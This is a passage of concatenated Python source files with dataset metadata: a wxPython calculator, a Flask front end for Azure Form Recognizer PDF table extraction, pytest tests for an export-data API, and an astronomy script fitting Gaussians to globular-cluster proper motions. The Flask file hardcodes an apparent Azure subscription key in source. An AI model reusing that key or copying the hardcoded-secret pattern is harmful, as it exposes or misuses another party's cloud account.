Modified time: 2020-02-25 12:18:05\n\nimport math;\n\nimport wx;\n\nfrom _Global import _GG;\nfrom function.base import *;\n\nfrom enum import Enum, unique;\n\n@unique\nclass CalcType(Enum):\n\tCalcOp\t= 0; # 计算操作\n\tConst\t= 1; # 常数\n\tSingle\t= 2; # 单参数运算\n\tDouble\t= 3; # 双参数运算\n\tOperate\t= 4; # 双参数运算\n\tBkLeft\t= 5; # 括号(左)\n\tBkRight\t= 6; # 括号(右)\n\tComma\t= 7; # 逗号\n\tDot\t\t= 8; # 句号\n\n\n# 阶乘\ndef factorial(val):\n\treturn math.factorial(int(val));\n\n# 组合\ndef combine(m, n):\n\tif m < 0 or n < 0:\n\t\traise ValueError(\"C(x,y) only accepts non negative numbers!\");\n\tif m > n:\n\t\traise ValueError(\"C(x,y) only allow x < y!\");\n\treturn factorial(n) / (factorial(m) * factorial(n-m));\n\n# 排列\ndef arrange(m, n):\n\tif m < 0 or n < 0:\n\t\traise ValueError(\"C(x,y) only 
accepts non negative numbers!\");\n\tif m > n:\n\t\traise ValueError(\"C(x,y) only allow x < y!\");\n\treturn factorial(n) / factorial(n-m);\n\nitemConfig = [\n\t{\"val\" : \"CL\", \"normalColor\" : wx.Colour(205, 155, 155), \"enterColor\" : wx.Colour(205, 96, 96), \"func\" : \"clear\", \"type\" : CalcType.CalcOp},\n\t{\"val\" : \"asin\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.asin(\", \"fmt\" : \"asin(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"acos\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.acos(\", \"fmt\" : \"acos(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"atan\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.atan(\", \"fmt\" : \"atan(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"<\", \"normalColor\" : wx.Colour(205, 186, 150), \"enterColor\" : wx.Colour(205, 149, 12), \"func\" : \"delete\", \"type\" : CalcType.CalcOp},\n\t\n\t{\"val\" : \"e\", \"normalColor\" : wx.Colour(210, 250, 210), \"enterColor\" : wx.Colour(156, 250, 156), \"func\" : \"math.e\", \"fmt\" : \"e\", \"type\" : CalcType.Const},\n\t{\"val\" : \"sin\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.sin(\", \"fmt\" : \"sin(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"cos\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.cos(\", \"fmt\" : \"cos(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"tan\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.tan(\", \"fmt\" : \"tan(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"Pi\", \"normalColor\" : wx.Colour(210, 250, 210), \"enterColor\" : wx.Colour(156, 250, 156), \"func\" : \"math.pi\", \"fmt\" : \"Pi\", \"type\" : CalcType.Const},\n\t\n\t{\"val\" : \"C(x,y)\", \"normalColor\" : wx.Colour(210, 210, 250), \"enterColor\" : wx.Colour(181, 160, 255), \"func\" : \"combine(\", \"fmt\" : \"C(\", \"type\" : CalcType.Double},\n\t{\"val\" : \"deg\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.degrees(\", \"fmt\" : \"deg(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"rad\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.radians(\", \"fmt\" : \"rad(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"n!\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"factorial(\", \"fmt\" : \"fact(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"%\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"%\", \"fmt\" : \"%\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"A(x,y)\", \"normalColor\" : wx.Colour(210, 210, 250), \"enterColor\" : wx.Colour(181, 160, 255), \"func\" : \"arrange(\", \"fmt\" : \"A(\", \"type\" : CalcType.Double},\n\t{\"val\" : \"(\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"(\", \"fmt\" : \"(\", \"type\" : CalcType.BkLeft},\n\t{\"val\" : \")\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \")\", \"fmt\" : \")\", \"type\" : CalcType.BkRight},\n\t{\"val\" : \"^\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"**\", \"fmt\" : 
\"^\", \"type\" : CalcType.Operate},\n\t{\"val\" : \"/\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"/\", \"fmt\" : \"/\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"|x|\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.fabs(\", \"fmt\" : \"abs(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"7\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"7\", \"fmt\" : \"7\", \"type\" : CalcType.Const},\n\t{\"val\" : \"8\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"8\", \"fmt\" : \"8\", \"type\" : CalcType.Const},\n\t{\"val\" : \"9\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"9\", \"fmt\" : \"9\", \"type\" : CalcType.Const},\n\t{\"val\" : \"*\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"*\", \"fmt\" : \"*\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"sqrt\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.sqrt(\", \"fmt\" : \"sqrt(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"4\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"4\", \"fmt\" : \"4\", \"type\" : CalcType.Const},\n\t{\"val\" : \"5\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"5\", \"fmt\" : \"5\", \"type\" : CalcType.Const},\n\t{\"val\" : \"6\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"6\", \"fmt\" : \"6\", \"type\" : CalcType.Const},\n\t{\"val\" : \"-\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"-\", \"fmt\" : \"-\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"log(x, y)\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.log(\", \"fmt\" : \"log(\", \"type\" : CalcType.Double},\n\t{\"val\" : \"1\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"1\", \"fmt\" : \"1\", \"type\" : CalcType.Const},\n\t{\"val\" : \"2\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"2\", \"fmt\" : \"2\", \"type\" : CalcType.Const},\n\t{\"val\" : \"3\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"3\", \"fmt\" : \"3\", \"type\" : CalcType.Const},\n\t{\"val\" : \"+\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"+\", \"fmt\" : \"+\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"ln\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.log(\", \"fmt\" : \"ln(\", \"type\" : CalcType.Single},\n\t{\"val\" : \",\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \",\", \"fmt\" : \",\", \"type\" : CalcType.Comma},\n\t{\"val\" : \"0\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"0\", \"fmt\" : \"0\", \"type\" : CalcType.Const},\n\t{\"val\" : \".\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \".\", \"fmt\" : \".\", \"type\" : CalcType.Dot},\n\t{\"val\" : \"=\", \"normalColor\" : wx.Colour(108, 166, 205), \"enterColor\" : wx.Colour(79, 148, 205), \"func\" : \"equal\", \"type\" : CalcType.CalcOp},\n];\n\ndef 
__getExposeData__():\n\treturn {\n\t\t# \"exposeDataName\" : {},\n\t};\n\ndef __getExposeMethod__(DoType):\n\treturn {\n\t\t\"getItemConfig\" : DoType.Override,\n\t\t\"onInputCalc\" : DoType.Override,\n\t\t\"isBkRightItem\" : DoType.Override,\n\t\t\"isCommaItem\" : DoType.Override,\n\t\t\"getBkRightLackCnt\" : DoType.Override,\n\t\t\"getCommaLackCnt\" : DoType.Override,\n\t};\n\ndef __getDepends__():\n\treturn [\n\t\t# {\n\t\t# \t\"path\" : \"tempBehavior\", \n\t\t# \t\"basePath\" : _GG(\"g_CommonPath\") + \"behavior/\",\n\t\t# },\n\t];\n\nclass CalculatorBehavior(_GG(\"BaseBehavior\")):\n\tdef __init__(self):\n\t\tsuper(CalculatorBehavior, self).__init__(__getDepends__(), __getExposeData__(), __getExposeMethod__, __file__);\n\t\tself._className_ = CalculatorBehavior.__name__;\n\t\tself.__result = \"\";\n\t\tself.__process = \"0\";\n\t\tself.__processList = [];\n\t\tpass;\n\n\t# 默认方法【obj为绑定该组件的对象,argList和argDict为可变参数,_retTuple为该组件的前个函数返回值】\n\t# def defaultFun(self, obj, *argList, _retTuple = None, **argDict):\n\t# \t_GG(\"Log\").i(obj._className_);\n\t# \tpass;\n\n\tdef getItemConfig(self, obj):\n\t\treturn itemConfig;\n\t\n\tdef onInputCalc(self, obj, cfg = {}):\n\t\tif cfg[\"type\"] == CalcType.CalcOp:\n\t\t\tgetattr(self, cfg[\"func\"])(obj, cfg);\n\t\telse:\n\t\t\tif len(self.__processList) == 0:\n\t\t\t\tself.__process = cfg[\"fmt\"];\n\t\t\telse:\n\t\t\t\tself.__process += cfg[\"fmt\"];\n\t\t\tself.__processList.append(cfg);\n\t\treturn self.__result, self.__process;\n\n\tdef getProcess(self):\n\t\treturn \"\".join([p[\"fmt\"] for p in self.__processList]);\n\n\tdef calcProcess(self):\n\t\ttry:\n\t\t\treturn eval(\"\".join([p[\"func\"] for p in self.__processList]));\n\t\texcept Exception as e:\n\t\t\t_GG(\"Log\").d(f\"Failed to calc process! 
Err[{e}].\");\n\t\treturn None;\n\n\tdef clear(self, obj, cfg = []):\n\t\tself.__processList.clear();\n\t\tself.__result, self.__process, = \"\", \"0\";\n\t\tpass;\n\n\tdef delete(self, obj, cfg = []):\n\t\tif len(self.__processList) > 0:\n\t\t\tself.__processList.pop();\n\t\tif len(self.__processList) == 0:\n\t\t\tself.__process = \"0\";\n\t\telse:\n\t\t\tself.__process = self.getProcess();\n\t\tpass;\n\t\n\tdef equal(self, obj, cfg = []):\n\t\t# 补足右括号\n\t\tbkRightLackCnt = self.getBkRightLackCnt(obj);\n\t\tif bkRightLackCnt > 0:\n\t\t\tfor i in range(bkRightLackCnt):\n\t\t\t\tself.__processList.append({\"func\" : \")\", \"fmt\" : \")\", \"type\" : CalcType.BkRight});\n\t\t# 计算结果\n\t\tret = self.calcProcess();\n\t\tif ret == None:\n\t\t\tself.__process = \"计算失败,请检查输入!\";\n\t\t\tself.__processList.clear();\n\t\telse:\n\t\t\tval = str(ret);\n\t\t\tself.__result = self.getProcess() + \"=\" + val;\n\t\t\tself.__process = val;\n\t\t\tself.__processList = [{\"func\" : val, \"fmt\" : val, \"type\" : CalcType.Const}];\n\t\tpass;\n\n\tdef isBkRightItem(self, obj, cfg = {}):\n\t\treturn cfg.get(\"type\", None) == CalcType.BkRight;\n\n\tdef isCommaItem(self, obj, cfg = {}):\n\t\treturn cfg.get(\"type\", None) == CalcType.Comma;\n\n\tdef getBkRightLackCnt(self, obj):\n\t\treturn self.__process.count(\"(\") - self.__process.count(\")\");\n\t\n\tdef getCommaLackCnt(self, obj):\n\t\tcnt = 0;\n\t\tfor p in self.__processList:\n\t\t\tif p[\"type\"] == CalcType.Double:\n\t\t\t\tcnt += 1;\n\t\treturn cnt - self.__process.count(\",\");","repo_name":"pytoolsip-tools/bcsc","sub_path":"assets/tool/behavior/CalculatorBehavior.py","file_name":"CalculatorBehavior.py","file_ext":"py","file_size_in_byte":10214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40859580150","text":"from flask import Flask, render_template, request\nimport json\nimport time\nfrom requests import get, post\nimport pandas as pd\nfrom IPython.display import display\napp = Flask(__name__)\n\n\nAPI_version = \"v2.1\"\n\n# Endpoint URL\nendpoint = r\"https://rnd.cognitiveservices.azure.com/\"\napim_key = \"6a920a79fbc2465fa1bc9bd94ef59e7e\"\nmodel_id = \"59deeb47-4548-4764-8dd2-a3e8d64f99f5\"\n#post_url = endpoint + \"/formrecognizer/v2.1/layout/analyze\"\npost_url = endpoint + \"/formrecognizer/%s/custom/models/%s/analyze\" % (API_version, model_id)\n\nheaders = {\n# Request headers\n 'Content-Type': 'application/pdf',\n 'Ocp-Apim-Subscription-Key': apim_key,\n}\n\nparams = {\n \"includeTextDetails\": True,\n \"locale\": \"en-US\"\n}\n\n\n@app.route('/upload_pdf', methods = ['POST'])\ndef extract_pdf():\n print(request.files)\n data_bytes = request.files['pdf'].read()\n errors = {}\n # with open(source, \"rb\") as f:\n # data_bytes = f.read()\n\n try:\n resp = post(url = post_url, data = data_bytes, headers = headers, params = params)\n if resp.status_code != 202:\n print(\"POST analyze failed:\\n%s\" % resp.text)\n quit()\n print(\"POST analyze succeeded:\\n%s\" % resp.headers)\n get_url = resp.headers[\"operation-location\"]\n except Exception as e:\n print(\"POST analyze failed:\\n%s\" % str(e))\n quit()\n\n \n resp_json = None\n df_dataframe = {}\n multiple_table_entries = {}\n final_df = []\n n_tries = 10\n n_try = 0\n wait_sec = 6\n while n_try < n_tries:\n try:\n resp = get(url = get_url, headers = {\"Ocp-Apim-Subscription-Key\": apim_key})\n resp_json = json.loads(resp.text)\n if resp.status_code != 200:\n print(\"GET Receipt results failed:\")\n quit()\n status = 
resp_json[\"status\"]\n if status == \"succeeded\":\n print(\"Receipt Analysis succeeded:\")\n break\n if status == \"failed\":\n print(\"Analysis failed:\")\n quit()\n # Analysis still running. Wait and retry.\n time.sleep(wait_sec)\n n_try += 1\n except Exception as e:\n msg = \"GET analyze results failed:\\n%s\" % str(e)\n print(msg)\n quit()\n \n if resp_json is not None:\n pd.options.display.max_columns = None\n Exctracted_text=[]\n for read_result in resp_json[\"analyzeResult\"][\"readResults\"]:\n print(\"Page No:%s\" % read_result[\"page\"])\n print(\"---------Page %d: extracted OCR------\" % read_result[\"page\"])\n for line in read_result[\"lines\"]:\n print(line[\"text\"])\n Exctracted_text.append(line[\"text\"])\n\n for pageresult in resp_json[\"analyzeResult\"][\"pageResults\"]:\n # print(\"Page No:%s\" % pageresult[\"page\"])\n\n for table in pageresult[\"tables\"]:\n print(\"--------Page %d Extracted table--------\" % pageresult[\"page\"])\n print(\"Extracted table\")\n print(\"No. of rows %s\" % table[\"rows\"])\n print(\"No. of Columns %s\" % table[\"columns\"])\n tableList = [[None for x in range(table[\"columns\"])] for y in range(table[\"rows\"])]\n for cell in table[\"cells\"]:\n tableList[cell[\"rowIndex\"]][cell[\"columnIndex\"]] = cell[\"text\"]\n # print(\"new table\", tableList)\n df = pd.DataFrame.from_records(tableList)\n df_dataframe = df.to_dict(orient='records')\n df_columns = df.to_dict()\n columns = []\n for key in df_columns:\n columns.append(key)\n final_df.append({'rows':df_dataframe,'columns':columns})\n #print(df)\n \n if 'documentResults' in resp_json[\"analyzeResult\"]:\n print('-------------------------------------------')\n print(resp_json[\"analyzeResult\"][\"documentResults\"])\n multiple_table_entries['document_result'] = resp_json[\"analyzeResult\"][\"documentResults\"]\n \n multiple_table_entries['text'] = Exctracted_text\n multiple_table_entries['multiple_tables'] = final_df\n\n \n return render_template('output.html', errors=errors, results=multiple_table_entries)\n\n@app.route(\"/home\")\ndef fileFrontPage():\n return render_template('fileform.html')\n\nif __name__ == '__main__':\n app.run()","repo_name":"Krishan267/TableExtracter","sub_path":"Table_Converter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4419323186","text":"import pytest\nimport tempfile\nimport os\nimport json\nimport init_db\n\nfrom myapp import app as my_app\n\n\n@pytest.fixture\ndef client():\n file_handle, file_name = tempfile.mkstemp()\n my_app.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + file_name\n my_app.app.config['TESTING'] = True\n\n init_db.main()\n client = my_app.app.test_client()\n with my_app.app.app_context():\n my_app.db.init_app(my_app.app)\n\n yield client\n\n os.close(file_handle)\n os.unlink(file_name)\n\n\ndef test_get_export_data_download(client):\n rv = client.get('/EXPORT_DATA_DOWNLOAD')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert len(json_data) == 6\n for x in json_data:\n assert x[\"SOURCE_TABLE\"] == 'PS_IMBALANCE'\n\n\ndef test_get_export_data_download_run_id(client):\n\n # Invalid run_id\n rv = client.get('/EXPORT_DATA_DOWNLOAD/0000')\n assert rv.status_code == 400\n\n # Valid run_id\n rv = client.get('/EXPORT_DATA_DOWNLOAD/f144ec22-921f-43ff-a93c-189695336580')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert len(json_data) == 1\n for x in 
json_data:\n assert 'f144ec22-921f-43ff-a93c-189695336580' == x['RUN_ID']\n\n\ndef test_get_export_data_download_run_id_file_name_source_table(client):\n\n # Invalid run_id, file_name and source data\n rv = client.get('/export_data_download/9e5c1872-3f8e-4ae5-85dc-c67a602d011e/thisisnotafilename9995/thisiswrongdata9995')\n assert rv.status_code == 400\n\n # Valid run_id, file_name and source_data\n rv = client.get('/export_data_download/9e5c1872-3f8e-4ae5-85dc-c67a602d011e/SomethingElse/PS_IMBALANCE')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert '9e5c1872-3f8e-4ae5-85dc-c67a602d011e' == json_data['RUN_ID']\n assert 'SomethingElse' == json_data['FILENAME']\n assert 'PS_IMBALANCE' == json_data['SOURCE_TABLE']\n\n # Valid run_id\n rv = client.get('/EXPORT_DATA_DOWNLOAD/f144ec22-921f-43ff-a93c-189695336580')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert len(json_data) == 1\n for x in json_data:\n assert 'f144ec22-921f-43ff-a93c-189695336580' == x['RUN_ID']\n\n\n\ndef test_post_export_data_download(client):\n\n json_data = {'DATE_CREATED': '2018-01-24 12:00:06',\n 'DOWNLOADABLE_DATA': 'RUN_ID,FLOW,SUM_PRIOR_WT,SUM_IMBAL_WT',\n 'FILENAME': 'TEST_FILE_NAME',\n 'RUN_ID': '9e5c1872-3f8e-4ae5-85dc-c67a602d011e',\n 'SOURCE_TABLE': 'IMBALANCE_WEIGHT'}\n\n json_string = json.dumps(json_data)\n print(json_string)\n\n response = client.post('/export_data_download', data=json_string)\n\n assert response.status_code == 201\n\n rv = client.get('/export_data_download')\n\n records = rv.json\n assert len(records) == 7\n\n\n\n","repo_name":"martyncolmer/ips_db_api","sub_path":"tests/test_export_data_download.py","file_name":"test_export_data_download.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34981997494","text":"# -*- coding: utf-8 -*-\n\n# ----------------------------------------------------------------------------\n#\n# PROJECT : JAS1101 Final Project\n#\n# ----------------------------------------------------------------------------\n\n# Docstring\n\"\"\"Get the Proper Motion Scale Size of Each Globular Cluster.\n\nWarnings\n--------\nSEE normalize_pm notebook for exploration of Gaussianity (assumed here)\nbecause it is NOT true.\n\n\nRoutine Listings\n----------------\n\n\"\"\"\n\n__author__ = [\"Nathaniel Starkman\", \"Qing Liu\", \"Vivian Ngo\"]\n\n\n# __all__ = [\n# \"\"\n# ]\n\n\n###############################################################################\n# IMPORTS\n\n# GENERAL\nimport os\nimport pathlib\nimport warnings\nimport argparse\nfrom typing import Optional, Sequence\n\nimport tqdm\n\nimport numpy as np\nimport scipy.stats as stats\n\nimport scipy.optimize as optimize\n\nimport astropy.units as u\nfrom astropy.table import Table, QTable\nfrom astropy.stats import SigmaClip\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# PROJECT-SPECIFIC\n\nfrom .util import gaussfitter\n\n\n###############################################################################\n# PARAMETERS\n\nwarnings.simplefilter(\"always\", UserWarning)\n\n\nDATA = str(pathlib.Path(__file__).parent.absolute()) + \"/data/\"\nFIGURES = str(pathlib.Path(__file__).parent.absolute()) + \"/figures/\"\n\nif not os.path.isdir(FIGURES):\n os.mkdir(FIGURES)\n\n###############################################################################\n# CODE\n###############################################################################\n\n\ndef 
read_globular_cluster_table(file: str) -> QTable:\n \"\"\"Read GC data table.\n\n Reads the GC table and assigns units\n\n Parameters\n ----------\n file\n\n \"\"\"\n # read table\n df = QTable.read(file, format=\"ascii.commented_header\")\n\n # units dictionary\n units = {\n \"x\": u.deg,\n \"y\": u.deg,\n \"pmx\": u.mas / u.yr,\n \"pmy\": u.mas / u.yr,\n \"pmx_e\": u.mas / u.yr,\n \"pmy_e\": u.mas / u.yr,\n \"g_mag\": u.mag,\n \"bp_rp\": u.mag,\n }\n\n # assign units\n for name, unit in units.items():\n df[name].unit = unit\n\n return df\n\n\n# /def\n\n\n # testing\ndef read_summary_table(file: str) -> QTable:\n \"\"\"Read summary table to be in Astropy format.\n\n Parameters\n ----------\n file: str\n file to read with QTable\n\n Returns\n -------\n df : QTable\n\n \"\"\"\n # read table, in Table format for better editing access\n df = Table.read(file, format=\"ascii.commented_header\")\n df.add_index(\"Name\") # index by name\n\n # units dictionary\n units = {\n \"ra\": u.deg,\n \"dec\": u.deg,\n \"dist\": u.kpc,\n \"vlos\": u.km / u.s,\n \"vloserr\": u.km / u.s,\n \"sigma\": u.km / u.s,\n \"rmax\": u.arcmin,\n \"pmra\": u.mas / u.yr,\n \"pmdec\": u.mas / u.yr,\n \"pmra_e\": u.mas / u.yr,\n \"pmdec_e\": u.mas / u.yr,\n \"rscale\": u.arcmin,\n \"pmdisp\": u.mas / u.yr,\n \"pmscale\": u.mas / u.yr,\n \"pmscale_e\": u.mas / u.yr,\n }\n\n # assign units\n for name, unit in units.items():\n if name in df.columns: # needed b/c creating columns\n df[name].unit = unit\n\n return QTable(df)\n\n\n# /def\n\n# ------------------------------------------------------------------------\n# https://scipy-cookbook.readthedocs.io/items/FittingData.html\n\n\ndef gaussian(\n height: float,\n center_x: float,\n center_y: float,\n width_x: float,\n width_y: float,\n):\n \"\"\"Returns a gaussian function with the given parameters.\n\n Parameters\n ----------\n height : float\n center_x: float\n center_y: float\n width_x: float\n width_y: float\n\n Returns\n -------\n Gaussian: FunctionType\n\n \"\"\"\n width_x = float(width_x)\n width_y = float(width_y)\n\n def Gaussian(x: Sequence, y: Sequence) -> Sequence:\n \"\"\"Gaussian function of x, y with preloaded center and widths.\n\n Parameters\n ----------\n x, y : array-like\n positions\n\n Returns\n -------\n array-like\n\n \"\"\"\n return height * np.exp(\n -(\n ((center_x - x) / width_x) ** 2\n + ((center_y - y) / width_y) ** 2\n )\n / 2\n )\n\n # /def\n\n return Gaussian\n\n\n# /def\n\n\ndef moments(data):\n \"\"\"Returns (height, x, y, width_x, width_y)\n the gaussian parameters of a 2D distribution by calculating its\n moments \"\"\"\n total = data.sum()\n X, Y = np.indices(data.shape)\n x = (X * data).sum() / total\n y = (Y * data).sum() / total\n col = data[:, int(y)]\n width_x = np.sqrt(\n np.abs((np.arange(col.size) - y) ** 2 * col).sum() / col.sum()\n )\n row = data[int(x), :]\n width_y = np.sqrt(\n np.abs((np.arange(row.size) - x) ** 2 * row).sum() / row.sum()\n )\n height = data.max()\n return height, x, y, width_x, width_y\n\n\n# /def\n\n\ndef fitgaussian(data):\n \"\"\"Returns (height, x, y, width_x, width_y)\n the gaussian parameters of a 2D distribution found by a fit\"\"\"\n params = moments(data)\n errorfunction = lambda p: np.ravel(\n gaussian(*p)(*np.indices(data.shape)) - data\n )\n p, cov, infodict, *errmsg = optimize.leastsq(\n errorfunction, params, full_output=True\n )\n return p, cov, infodict, errmsg\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n\ndef scale_values_2d(name, df, 
threshold=0.8, sigma=4):\n \"\"\"scale_values_2d\n\n Use Sturge’s Rule to determine number of bins\n\n TODO\n ----\n don't choose arbitrary threshold\n don't use histogram?\n not arbitrary rotation threshold\n\n \"\"\"\n\n ismember = df[\"memberprob\"] > threshold\n\n pmx = df[\"pmx\"][ismember].to_value(\"mas / yr\")\n pmy = df[\"pmy\"][ismember].to_value(\"mas / yr\")\n\n # Sigma Clip major outliers\n\n sigclip = SigmaClip(sigma=sigma, maxiters=1.0)\n resx = sigclip(pmx)\n resy = sigclip(pmy)\n\n pmx = resx.data[~resx.mask & ~resy.mask]\n pmy = resy.data[~resx.mask & ~resy.mask]\n\n # -----------\n # plot normality test\n\n fig, (ax0, ax1) = plt.subplots(1, 2, figsize=(6, 3))\n stats.probplot(pmx, dist=\"norm\", plot=ax0)\n stats.probplot(pmy, dist=\"norm\", plot=ax1)\n plt.tight_layout()\n plt.savefig(FIGURES + f\"{name}_QQ.pdf\")\n plt.close()\n\n # -----------\n\n # Now histogram\n # need equi-spaced bins\n # TODO error estimate from bin size\n\n data, *edges = np.histogram2d(\n pmx, pmy, bins=int(1 + 3.222 * np.log(len(pmx))), density=True\n )\n\n # fit 2D Gaussian, with freedom of rotation\n params, cov, infodict, errmsg = gaussfitter.gaussfit(\n data, circle=0, rotate=1, vheight=1, return_all=1\n )\n\n height, amp, x, y, width_x, width_y, rota = params\n\n labels = (\"height\", \"amp\", \"x\", \"y\", \"width_x\", \"width_y\", \"rota\")\n\n # Check if need to do a rotated system. get better results if don't.\n if rota < 2: # not rotated\n amp = None\n rota = 0\n params, cov, infodict, errmsg = fitgaussian(data)\n height, x, y, width_x, width_y = params\n\n labels = (\"height\", \"x\", \"y\", \"width_x\", \"width_y\")\n\n # -----------\n # plot 2D Gaussian\n\n plt.matshow(data, cmap=plt.cm.gist_earth_r)\n\n if rota == 0:\n fit = gaussian(*params)\n else:\n fit = gaussfitter.twodgaussian(params, circle=0, rotate=1, vheight=1)\n\n plt.contour(fit(*np.indices(data.shape)), cmap=plt.cm.copper)\n ax = plt.gca()\n\n rota %= 360 # shift back to 0 - 360 degree rotation\n\n plt.text(\n 0.95,\n 0.05,\n \"\"\"\n x : %.1f\n y : %.1f\n rot : %.1f\n width_x : %.1f\n width_y : %.1f\"\"\"\n % (x, y, rota, width_x, width_y),\n fontsize=16,\n horizontalalignment=\"right\",\n verticalalignment=\"bottom\",\n transform=ax.transAxes,\n )\n plt.savefig(FIGURES + f\"{name}_2D.pdf\")\n plt.close()\n\n # -----------\n\n if cov is not None:\n\n sns.heatmap(np.log10(np.abs(cov)), cmap=\"viridis_r\")\n plt.xticks(plt.xticks()[0], labels)\n plt.yticks(plt.yticks()[0], labels)\n plt.savefig(FIGURES + f\"{name}_cov.pdf\")\n plt.close()\n\n # -----------\n\n return width_x, width_y, cov, labels, edges\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n\ndef average_scale_value(width_x, width_y, edges_x, edges_y):\n\n flag = False\n\n if not np.allclose(np.diff(edges_x)[:-1], np.diff(edges_x)[1:]):\n warnings.warn(\"x edges are not equally spaced\")\n flag = True\n if not np.allclose(np.diff(edges_y)[:-1], np.diff(edges_y)[1:]):\n warnings.warn(\"y edges are not equally spaced\")\n flag = True\n\n pm_per_bin_x = np.diff(edges_x)[0] * u.mas / u.yr\n pm_per_bin_y = np.diff(edges_y)[0] * u.mas / u.yr\n\n pm_scale = (width_x * pm_per_bin_x + width_y * pm_per_bin_y) / 2\n\n # eror estimate\n pm_scale_err = np.abs(width_x * pm_per_bin_x - width_y * pm_per_bin_y) / 2\n\n return pm_scale, pm_scale_err, flag\n\n\n# /def\n\n\n###############################################################################\n# Command 
